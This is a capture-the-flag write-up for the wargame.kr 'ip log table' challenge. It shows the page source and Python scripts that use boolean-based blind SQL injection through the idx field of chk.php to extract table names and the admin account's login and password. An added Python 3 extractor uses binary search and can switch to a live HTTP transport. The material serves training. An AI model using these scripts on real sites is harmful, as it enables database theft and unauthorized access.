ip log table
Blind SQLi challenge.
You can use 'Ascii' to 'Date'
Page source
<style>
#mv_admin {cursor:hand; font-family:verdana; padding:10px; font-weight:bold;}
td{text-align:center; height:30px;}
.menu {background-color:#163; color:#fab;}
.menu td{font-weight:bold;}
.list td{text-align:center; cursor:hand;}
</style>
<script src="./jquery.min.js"></script>
<script> var f;
function ov(){ this.style.color="#11f"; this.style.background="#ff0"; this.style.fontWeight="bold";}
function ou(){ this.style.color="#000"; this.style.background="#fff"; this.style.fontWeight="normal";}
function mv(){ f.idx.value=this.id; f.submit(); }
function init(){
a=document.getElementById("mv_admin");
a.onmouseover=ov; a.onmouseout=ou; a.onclick=function(){window.location='admin.php';}
f=document.getElementById("f"); iplist=$(".list");
for(i=0;i<iplist.length;i++){
iplist[i].onmouseover=ov; iplist[i].onmouseout=ou; iplist[i].onclick=mv;
}
}
</script>
<body onload="init();">
<center>
<h1>ACCESS IP LOG TABLE</h1>
<hr /><div id="mv_admin">[+] admin login [+]</div><hr />
<table border=1 width=550 align=center>
<tr class='menu'><td>idx</td><td>IP address</td></tr>
.
.
.
.
</table>
</center>
<form id="f" method="post" action="chk.php">
<input type="hidden" name="idx" value="blueh4g">
</form>
</body>
Looking at the source, clicking a row puts that row's id into the hidden idx field and POSTs the form to chk.php, which answers with the row's log time. So idx is the injection point; let's write a script to check it.
import urllib
import urllib2

# Send a single injected idx value to chk.php and print the response body (Python 2)
url = "http://wargame.kr:8080/ip_log_table/chk.php"
opener = urllib2.build_opener(urllib2.HTTPHandler)
payload = {"idx": "39749 and 1=0#"}   # compare against "39749 and 1=1#"
data = urllib.urlencode(payload)
request = urllib2.Request(url, data)
request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
request.add_header('Cookie', 'PHPSESSID=cookie')   # put your own session id here
response = opener.open(request)
print response.read()
39748 and 1=1 => TRUE => IP log time : 2020-01-01 17:43:20
39748 and 1=0 => FALSE => IP log time : 1970-01-01 09:00:00
That is a boolean oracle: when the injected condition is true the page shows the row's real log time, and when it is false it shows 1970-01-01 09:00:00 (the Unix epoch rendered in KST, which is what the date formatting produces when the query returns nothing). Comparing the response against that fixed string is all a blind SQLi needs.
import urllib
import urllib2
import time

key = ""
FALSE_MARK = "1970-01-01 09:00:00"   # epoch date in the response: the condition was false

def chk(payload):
    # POST one injected idx value to chk.php and return the raw response body
    url = "http://wargame.kr:8080/ip_log_table/chk.php"
    opener = urllib2.build_opener(urllib2.HTTPHandler)
    data = urllib.urlencode({"idx": payload})
    request = urllib2.Request(url, data)
    request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
    response = opener.open(request)
    body = response.read()
    print payload
    print body
    return body

# The phases below were run one at a time; uncomment the one you want.

# Phase 1: how many tables are visible in information_schema.tables (search window 70..99)
'''
key = ""
for i in range(70,100):
    payload = "39749 and (select count(*) from information_schema.tables)="+str(i)
    if not FALSE_MARK in chk(payload):
        key += str(i)
        print "[*] " +key
        break
    else:
        print "[-] Fail!"
    time.sleep(0.1)
'''
#result : 72

# Phase 2: last table name (offset 71), one character at a time over printable ASCII
'''
key = ""
for i in range(15):
    for j in range(33,127):
        payload = "39749 and ord(substring((select table_name from information_schema.tables limit 71,1),"+str(i+1)+",1))="+str(j)+"#"
        print chr(j)
        if not FALSE_MARK in chk(payload):
            key += chr(j)
            print "[*] " +key
            break
        else:
            print "[-] Fail!"
        time.sleep(0.1)
'''
#result : ip_table

# Phase 3: the table before it (offset 70)
'''
key = ""
for i in range(15):
    for j in range(33,127):
        payload = "39749 and ord(substring((select table_name from information_schema.tables limit 70,1),"+str(i+1)+",1))="+str(j)+"#"
        print chr(j)
        if not FALSE_MARK in chk(payload):
            key += chr(j)
            print "[*] " +key
            break
        else:
            print "[-] Fail!"
        time.sleep(0.1)
'''
#result : admin_table

# Phase 4: the id column of admin_table (column name guessed from the login form)
'''
key = ""
for i in range(15):
    for j in range(33,127):
        payload = "39749 and ord(substring((select id from admin_table),"+str(i+1)+",1))="+str(j)+"#"
        print chr(j)
        if not FALSE_MARK in chk(payload):
            key += chr(j)
            print "[*] " +key
            break
        else:
            print "[-] Fail!"
        time.sleep(0.1)
'''
#result : blue_admin

# Phase 5: the ps column of admin_table
'''
key = ""
for i in range(15):
    for j in range(33,127):
        payload = "39749 and ord(substring((select ps from admin_table),"+str(i+1)+",1))="+str(j)+"#"
        print chr(j)
        if not FALSE_MARK in chk(payload):
            key += chr(j)
            print "[*] " +key
            break
        else:
            print "[-] Fail!"
        time.sleep(0.1)
'''
#result : 0h~myp4ss!
There are so many columns in information_schema that extracting the column names this way is tedious.
Using the field names from the login page, id and ps, directly as the column names worked.
Log in with the recovered id and password.
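As an added example (not code from this writeup), here is a Python 3 version of the same boolean-based blind extraction that replaces the linear 33..126 scan with a binary search on ord(), so each character costs about 8 requests instead of up to 94, and that enumerates admin_table's columns from information_schema.columns instead of guessing them from the login form. fake_chk, FAKE_SCHEMA and TABLE_NAMES are a constructed in-memory stand-in for chk.php and its database (70 filler table names plus admin_table and ip_table, with the values the writeup recovered) so the script runs offline; http_oracle is the real transport and is only used when you swap it in for the live target.

```python
import re
import urllib.parse
import urllib.request

# Constructed stand-in for the challenge database: only the sub-selects the extractor
# below emits are understood. Nothing here was read from the real server.
FAKE_SCHEMA = {"admin_table": {"id": "blue_admin", "ps": "0h~myp4ss!"}}
# MySQL also exposes information_schema/mysql tables; 70 filler names stand in for them.
TABLE_NAMES = ["sys_table_%02d" % i for i in range(70)] + ["admin_table", "ip_table"]

TRUE_BODY = "IP log time : 2020-01-01 17:43:20"
FALSE_BODY = "IP log time : 1970-01-01 09:00:00"   # epoch in KST: the condition was false


def eval_expr(expr):
    """Resolve a supported sub-select against the fake schema (simulation only)."""
    if expr == "select count(*) from information_schema.tables":
        return len(TABLE_NAMES)
    m = re.fullmatch(r"select table_name from information_schema\.tables limit (\d+),1", expr)
    if m:
        k = int(m.group(1))
        return TABLE_NAMES[k] if k < len(TABLE_NAMES) else ""
    m = re.fullmatch(r"select column_name from information_schema\.columns "
                     r"where table_name='(\w+)' limit (\d+),1", expr)
    if m:
        cols, k = list(FAKE_SCHEMA.get(m.group(1), {})), int(m.group(2))
        return cols[k] if k < len(cols) else ""
    m = re.fullmatch(r"select (\w+) from (\w+)", expr)
    if m:
        return FAKE_SCHEMA[m.group(2)][m.group(1)]
    raise ValueError("unsupported expression: " + expr)


def fake_chk(idx):
    """Simulate chk.php: the real log date comes back only when the injected condition holds."""
    m = re.fullmatch(r"39749 and (.+)#", idx)
    if not m:
        return FALSE_BODY
    cond = m.group(1)
    if (m := re.fullmatch(r"\(\((.+)\)\)>(\d+)", cond)):
        ok = int(eval_expr(m.group(1))) > int(m.group(2))
    elif (m := re.fullmatch(r"length\(\((.+)\)\)>(\d+)", cond)):
        ok = len(str(eval_expr(m.group(1)))) > int(m.group(2))
    elif (m := re.fullmatch(r"ord\(substring\(\((.+)\),(\d+),1\)\)>(\d+)", cond)):
        s, pos = str(eval_expr(m.group(1))), int(m.group(2))
        c = ord(s[pos - 1]) if pos <= len(s) else 0   # MySQL: ord('') = 0 past the end
        ok = c > int(m.group(3))
    else:
        raise ValueError("unsupported condition: " + cond)
    return TRUE_BODY if ok else FALSE_BODY


class BlindExtractor:
    """Boolean-based blind SQLi driver; every value is found by binary search on '>'."""

    def __init__(self, oracle, idx="39749"):
        self.oracle = oracle        # callable(idx_value) -> response body
        self.idx = idx
        self.requests = 0

    def is_true(self, cond):
        self.requests += 1
        # Same oracle as the writeup: the epoch date means the WHERE clause was false.
        return FALSE_BODY not in self.oracle("%s and %s#" % (self.idx, cond))

    def search(self, cond_gt, hi):
        """Return v in [0, hi] with cond_gt(v-1) true and cond_gt(v) false (~log2(hi) requests)."""
        lo = 0
        while lo < hi:
            mid = (lo + hi) // 2
            if self.is_true(cond_gt(mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract_int(self, expr, hi=1 << 16):
        return self.search(lambda v: "((%s))>%d" % (expr, v), hi)

    def extract_string(self, expr, max_len=4096):
        length = self.search(lambda v: "length((%s))>%d" % (expr, v), max_len)
        chars = []
        for pos in range(1, length + 1):   # 8 requests per character instead of up to 94
            chars.append(chr(self.search(
                lambda v: "ord(substring((%s),%d,1))>%d" % (expr, pos, v), 255)))
        return "".join(chars)

    def list_rows(self, select_fmt):
        """Walk 'limit k,1' until an empty string comes back, i.e. past the last row."""
        rows = []
        while (value := self.extract_string(select_fmt % len(rows))):
            rows.append(value)
        return rows


def http_oracle(url, phpsessid):
    """Real transport for chk.php (one POST per question); dump_admin below uses fake_chk."""
    def send(idx):
        data = urllib.parse.urlencode({"idx": idx}).encode()
        req = urllib.request.Request(url, data=data, headers={"Cookie": "PHPSESSID=" + phpsessid})
        with urllib.request.urlopen(req) as resp:
            return resp.read().decode("utf-8", "replace")
    return send


def dump_admin(oracle):
    """The writeup's chain: table count, last two table names, admin_table's columns and values."""
    ex = BlindExtractor(oracle)
    n_tables = ex.extract_int("select count(*) from information_schema.tables")
    tables = [ex.extract_string("select table_name from information_schema.tables limit %d,1" % k)
              for k in (n_tables - 2, n_tables - 1)]
    # Enumerate the columns instead of guessing them from the login form.
    cols = ex.list_rows("select column_name from information_schema.columns "
                        "where table_name='admin_table' limit %d,1")
    creds = {c: ex.extract_string("select %s from admin_table" % c) for c in cols}
    return n_tables, tables, cols, creds, ex.requests


if __name__ == "__main__":
    print(dump_admin(fake_chk))
    # live target: dump_admin(http_oracle("http://wargame.kr:8080/ip_log_table/chk.php", "<PHPSESSID>"))
```

Against the simulated backend the whole chain (count, two table names, two column names and two ten-character values) takes under 500 requests; the per-character scan in the writeup's script would need up to 94 requests for each character alone. The length query first, then ord() per position, also avoids relying on the 33..126 window: a byte outside printable ASCII is still found because the search runs over 0..255.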